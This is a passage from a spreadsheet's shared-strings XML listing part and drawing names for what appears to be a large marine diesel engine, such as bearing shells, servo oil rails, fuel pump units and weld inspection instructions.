    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>WHITE METAL LINNING</t>
  </si>
  <si>
    <t>BEARING SHELL CRANK PIN UPPER PART</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>WHITE METAL LINING WHITE M.SPEC</t>
  </si>
  <si>
    <t>GUIDE SHOE-MIDDLE PART</t>
  </si>
  <si>
    <t>WHITE METAL LINNING / SPECIAL</t>
  </si>
  <si>
    <t>PISTON - SKIRT</t>
  </si>
  <si>
    <t>QUALITY AND TEST SPECIFICATION FOR</t>
  </si>
  <si>
    <t>ELECTRIC CONNECTION DIAGRAM</t>
  </si>
  <si>
    <t>SOFTWARE SPECIFICATION</t>
  </si>
  <si>
    <t>MATERIAL AND TEST INSTRUCTION</t>
  </si>
  <si>
    <t>INTERMEDIATE WHEEL CAMSHAFT DRIVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SCREWED ROD</t>
  </si>
  <si>
    <t>WHEEL HUB</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>INTERMED. WHEEL SERVO PUMP UNIT</t>
  </si>
  <si>
    <t>INTERMEDIATE WHEEL SERVO PUMP UNIT</t>
  </si>
  <si>
    <t>INTERMED. WHEEL FUEL PUMP UNIT</t>
  </si>
  <si>
    <t>SHUT-OFF VALVE STARTING AIR ARRANG.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DU-BUSH</t>
  </si>
  <si>
    <t>HANDWHEEL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LINER BUSH</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ADJUSTING VALVE BODY</t>
  </si>
  <si>
    <t>COPPER PIPE L=1.5m</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MALE STUD</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SMALL BOURDON-TUBE PRESS. GAUGE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>STAUFF-STRAP</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LOCAL MANUAL CONTROL BOX E25</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TIME RELAY TYPE C81</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TERMINALELATE</t>
  </si>
  <si>
    <t xml:space="preserve">SUPPLEMENTARY MATERIAL INSTRUCTION </t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ASSEMBLY DIAGRAM</t>
  </si>
  <si>
    <t>BEARING RING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CAM SHAFT</t>
  </si>
  <si>
    <t>CONNECTING SHAFT</t>
  </si>
  <si>
    <t>COVER SHELL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>END PLATE</t>
  </si>
  <si>
    <t>FUEL CAM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HOUSING COVER</t>
  </si>
  <si>
    <t>BOX</t>
  </si>
  <si>
    <t>BEARING METAL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BEARING RUNNING LAYERS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SHAFT BEARING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CONNECTION PIN</t>
  </si>
  <si>
    <t>CONTROL OIL PIPING</t>
  </si>
  <si>
    <t>INSPECTION RECORD</t>
  </si>
  <si>
    <t>INSTRUCTION MANUAL</t>
  </si>
  <si>
    <t>PACKING INSTRUCTIONS</t>
  </si>
  <si>
    <t>RETAINING RING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BLIND RIVET NUT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DIRTY OIL DRAIN PIPE</t>
  </si>
  <si>
    <t>DOOR</t>
  </si>
  <si>
    <t>DRILLING PATTERNS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FEED PIPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>OVERFLOW PIPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>RELIEF PIPING</t>
  </si>
  <si>
    <t>SPLASH GUARD</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>STUD BOLT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SUPPORTING FRAME</t>
  </si>
  <si>
    <t>THIN SHEET</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>WELDING BLOCK</t>
  </si>
  <si>
    <t>WELDING NUT</t>
  </si>
  <si>
    <t>RAIL UNIT-REPAIR PLATE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FLOW LIMITING VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FUEL SUPPLY PIPE</t>
  </si>
  <si>
    <t>RECTANGULAR PIPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SEALING PLATE</t>
  </si>
  <si>
    <t xml:space="preserve">SUPPORT </t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CONTROL OIL SUPPLY</t>
  </si>
  <si>
    <t>HIGH-PRESSURE HOSE</t>
  </si>
  <si>
    <t>CLOSING PIECE</t>
  </si>
  <si>
    <t>CONTROL OIL PUMP RAIL UNIT</t>
  </si>
  <si>
    <t>COVER FOR OIL PUMP</t>
  </si>
  <si>
    <t>DISTRIBUTOR BLOCK</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HOLDER LOWER PART</t>
  </si>
  <si>
    <t>PROFILE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SUPPORT CONTROL OIL SUPPLY</t>
  </si>
  <si>
    <t>TRAVERSE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CONTROL OIL PUMP</t>
  </si>
  <si>
    <t>ELASTIC COUPLING</t>
  </si>
  <si>
    <t>HIGH-PRESSURE OIL PUMP</t>
  </si>
  <si>
    <t>FUEL PUMP UNIT ASSEMBLY</t>
  </si>
  <si>
    <t>FUEL PUMP UNIT</t>
  </si>
  <si>
    <t>FUEL PUMP ACTUATOR ARRANGEMENT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>INSTALLATIONS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SERVO PUMP UNIT ASSEMBLY</t>
  </si>
  <si>
    <t>CASING SERVO PUMP UNIT</t>
  </si>
  <si>
    <t>MEASURING CONNECTING PIECE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TEST EXCESS PRESSURE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BALVE VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>EMPTYING SCREW</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">LEAK OIL PIPE </t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LEAK PIPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>O-RIONG</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PIPE BRACKET_LOWER PART</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PIPE BRACKET_UPPER PART</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SERVO OIL RAIL_ASSEMBLY</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SERVO OIL RAIL_MACHINING  DRAWING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SERVO OIL RAIL_TEST PRESSURE DRAWING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">VALVE  </t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>VALVE SEAT SCREW</t>
  </si>
  <si>
    <t>SCREWED SLEEVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CYL. LUBRICATING DRIVE</t>
  </si>
  <si>
    <t>LUBRICATING OIL INLET PIPE</t>
  </si>
  <si>
    <t>INSCRIPTION PLATE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LIMIT LEVER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MOUNTING AND ADJUSTING INSTRUCT.</t>
  </si>
  <si>
    <t>PARALLEL KEY</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>REGULATING LINKAGE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SET COLLAR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SPHERICAL HEAD</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TORSION SPRING</t>
  </si>
  <si>
    <t>PRSEEURE GAUGE CONNECTION</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BEDPLATE LIFTING DEVICE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BEDPLATE FOUNDATION HOLES</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>EARTHING POLE</t>
  </si>
  <si>
    <t>FLITER SCREEN</t>
  </si>
  <si>
    <t>INSPECTION SCOPE MAP</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>INSTR. MT OF WELD SEAMS</t>
  </si>
  <si>
    <t>INSTR. PWHT OF ENGINE STRUCTURE</t>
  </si>
  <si>
    <t>INSTR. UT OF HOT ROLLED PLATES</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>INSTR. UT OF ROOT RUNS LEVEL C</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>INSTR. UT OF WELD SEAMS</t>
  </si>
  <si>
    <t>MAIN BEARING COVER SPECIAL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>WELD.SEQ.A.PL.SUB.TO.MAT.VER.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>WELDING INSPECTION MAP</t>
  </si>
  <si>
    <t>QUALITY AND TEST SPEC.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TRANSPORT AND STORAGE</t>
  </si>
  <si>
    <t>BEARING BLANK F. MAIN BEARING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">Main bearing shell, upper half  </t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>POSITIONING PIN</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MAIN BEARING SHELL SPECIAL</t>
  </si>
  <si>
    <t>JACK BOLT MAIN BEARING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>VENT VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>THRUST PAD</t>
  </si>
  <si>
    <t>WHITE METAL LINING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CABLE PROTECTOR TUBE</t>
  </si>
  <si>
    <t>PIPE SUPPORT 2-PARTS</t>
  </si>
  <si>
    <t>BEARING PIECE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CABLE DUCT HOLDER</t>
  </si>
  <si>
    <t>CASING PLATE</t>
  </si>
  <si>
    <t>COLUMN ELECTRICAL PARTS WELDING</t>
  </si>
  <si>
    <t xml:space="preserve">COVER  </t>
  </si>
  <si>
    <t>ELEMENT DISTRIBUTION DRAWING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FASTENING BRACKET</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LEVER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LOWER GASKET</t>
  </si>
  <si>
    <t>UPPER GASKET</t>
  </si>
  <si>
    <t>CASING FRONT PART LEFT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CASING FRONT PART RIGHT</t>
  </si>
  <si>
    <t>OIL SCRAPER RING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>OIL THROWER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CONNECTING PLATE</t>
  </si>
  <si>
    <t>CROSS RIB</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>RIB OUTSIDE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TIE ROD MATERIAL ORDER</t>
  </si>
  <si>
    <t>BUSH HALF</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>center wall</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CHARGE AIR COOLER HOUSING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FOOT STEP</t>
  </si>
  <si>
    <t>HOLLOW STEEL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PLATFORM</t>
  </si>
  <si>
    <t>SCAVENGE AIR DUCT AFTER COOLER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SCAVENGE AIR DUCT BEFORE COOLER</t>
  </si>
  <si>
    <t>UNDERSLUNG SEPARATE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>AUXILIARY BLOWER BOX</t>
  </si>
  <si>
    <t>EYE</t>
  </si>
  <si>
    <t>INSULATION RING TWO-PART</t>
  </si>
  <si>
    <t>LOWER STAY</t>
  </si>
  <si>
    <t>L-STEEL</t>
  </si>
  <si>
    <t>SAFETY LEVER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SCAVENGE AIR RECEIVER CRACK REP</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SOUND INSULATION 2 PIECES</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TUBE BEND 45</t>
  </si>
  <si>
    <t>EMERGENCY LUBRICATING SYSTEM</t>
  </si>
  <si>
    <t>STANDBY LUB. WITH HIGH TANK</t>
  </si>
  <si>
    <t>TUBE BUNDLE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>EXPANSION PIECE TC GAS INLET</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>AUXILIARY BLOWER - SWITCH BOX</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>WIRING DIAGRAMM</t>
  </si>
  <si>
    <t>CONNECTION WATER CHAMBER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GUIDE RING</t>
  </si>
  <si>
    <t>NAMEPLATE</t>
  </si>
  <si>
    <t>SCAVENGE AIR WASTE GATE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SILENCER COVER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SILENCER INNER PART</t>
  </si>
  <si>
    <t>STEEL WOOL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ADAPTER MACHNING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>AMPLIFIER NAMEPLATE</t>
    <phoneticPr fontId="13" type="noConversion"/>
  </si>
  <si>
    <t>ANGLE PIPE BRACKET</t>
  </si>
  <si>
    <t>AXIAL EXPENSION PIECE</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>BEARING SHELL CRANK PIN LOWER HALF</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BEARING SHELL CRANK PIN UPPER HALF</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BONDED WASHER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BOTTLE FIXING BAND</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BRAKET</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BREAKER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CABLE DUCT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CABLE DUCT SUPPORT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CABLE DUCTS L=1.8m</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CABLE DUCTS SUPPORT</t>
  </si>
  <si>
    <t>Cable with 90 Deg. Connector 43682-K285-10.0 For supply unit det.1</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Cable with 90 Deg. Connector 43682-K285-12.5 For supply unit det.2</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Cable with 90 Deg. Connector 43682-K285-2.0 For cyl.3, cyl.4</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Cable with 90 Deg. Connector 43682-K285-3.5 For cyl.2, cyl.5</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Cable with 90 Deg. Connector 43682-K285-5.0 For cyl.1</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>COAMING</t>
  </si>
  <si>
    <t>COLLAR 2-PARTS</t>
  </si>
  <si>
    <t>CONE NON-RETURN VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TRANSITION PIECE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CONTROL BOX E20</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CONTROL BOX E25</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">Control oil pump starter </t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">COPPER PIPE PLAN </t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CRADLE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CUP SPRING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CYL. LUBRICATING PUMPS ARRANG.</t>
  </si>
  <si>
    <t>CYLINDER COVER PLATFORM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">DISTANCE </t>
    <phoneticPr fontId="13" type="noConversion"/>
  </si>
  <si>
    <t>DISTTANCE PIECE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ENTRANCE LADDER</t>
    <phoneticPr fontId="13" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">EXPLOSION-PROOF LAMP </t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>F SPANNER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FILLING DEVICE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">FLANGE </t>
  </si>
  <si>
    <t>FRICTION SHIM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FRONT FRAME</t>
  </si>
  <si>
    <t>F-SPANNER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">INJECTOR TEST BENCH </t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HAND RAIL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HEXAGON HEAD BOLT WITH CROSS HOLE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HOLDING DEVICE</t>
  </si>
  <si>
    <t>INSIDE RIB</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>INSULATION FOR PIPES</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>INTERMEDIATE GIRDER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LADDER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LAMP AND CABLE DUCT ARRANGEMENT DRAWING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LAMP CABLE DUCTS ARRANGEMENT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LAMP SEAT AND CABLE DUCT(WELDING DRAWING)</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LAMP wiring diagram</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LEAKAGE COLLECTOR PIPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LOCKING SCREW</t>
  </si>
  <si>
    <t>MAIN BEARING SHELL LOWER HALF</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MAIN BEARING SHELL SPECIAL LOWER HALF</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MAIN BEARING SHELL SPECIAL UPPER HALF</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MAIN BEARING SHELL UPPER HALF</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>NAME PLATE HOLDER</t>
  </si>
  <si>
    <t>NARROW FLANGE I-BEAMS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>OIL FILLER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>OIL SUMP</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PAN HEAD SCREW</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PEDESTAL PISTON UNDERSIDE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PIPE BRAKET</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PIPING SUPPORT ARRANGEMENT</t>
  </si>
  <si>
    <t>PIPING UNION</t>
  </si>
  <si>
    <t>PLATE HOLDER</t>
  </si>
  <si>
    <t>PRESSURE PIECE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">RAILING </t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">CASE </t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">SCAVENGE AIR RECEIVER </t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SEAMLESS PIPE</t>
  </si>
  <si>
    <t>SEAMLESS TUBE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SERVICE PLATFORM</t>
  </si>
  <si>
    <t>SERVO OIL RAIL(TEST PRESSURE DRAWING)</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SEVO OIL RAIL_INSTRUCTION AND ADDITIONAL DATA</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SPECIFICAITONS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">SQUARE PIPE </t>
    <phoneticPr fontId="13" type="noConversion"/>
  </si>
  <si>
    <t>PROTECTION</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>STEEL GASKET</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>STEEL WIRE</t>
  </si>
  <si>
    <t>STEEL WIRE MESH</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SUPPOPRT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SUPPORT ON LOWER PLATFORM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SUSPENSION ON LOWER  PLATFORM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">TERMINAL BOX E10 </t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TESTING DEVICE</t>
  </si>
  <si>
    <t>THE DRAIN PIPE</t>
  </si>
  <si>
    <t>THREAD BUSH</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">TOOL PANEL </t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TOOL SUPPLY UNIT INTERM. GEAR WHEEL</t>
  </si>
  <si>
    <t>TOP PART</t>
  </si>
  <si>
    <t xml:space="preserve">TRANSISTION PIECE </t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TRANSITION PIECE ASSY.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">TUBE  </t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TUBE BEND 90</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>WASTE GATE ADJUSTING INSTRUCTION</t>
  </si>
  <si>
    <t>WASTE GATE CONTROL DIAGRAM</t>
  </si>
  <si>
    <t>WELDING PLATE</t>
  </si>
  <si>
    <t>WELDING SLEEVE</t>
  </si>
  <si>
    <t xml:space="preserve">PRECISION CONTROL VALVE  </t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SPEC. KEY</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>3/2 WAY SOLENOID VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>4/2 WAY VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>5/2 WAY VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GO DEG.PIPE BENDS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ACCESSORIES-HYDR TOOLS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ADAPTING PLATE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ADAPTOR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ADHESIVE STICK</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ADJ.STRAIGHT MALE COUPL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ADJUSTABLE ELBOW COUPL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ADJUSTABLE T-COUPL.COMPL.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ADJUSTABLE TEE COUPLINGS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ADJUSTM.OF CHAIN TIGHT.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ADJUSTMENT OF CHAIN TIGHTENER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>AIR COOL.CLEAN.PIPES</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>AIR COOLER CLEANING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>AIR COOLER CLEANING SYSTEM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>AIR CYLINDER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>AIR PISTON</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>AIR RECEIVER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>AIR-COOL.CLEAN.PIPES.TO</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ALARM AND SAFETY DEVICES</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ARR.-TURN.GEAR INTERLOCK</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ARR.CHARGING AIR PIPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ARR.OF AIR COOLER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ARR.OF AIR CYLINDER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ARR.OF AUXILIARY BLOWER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
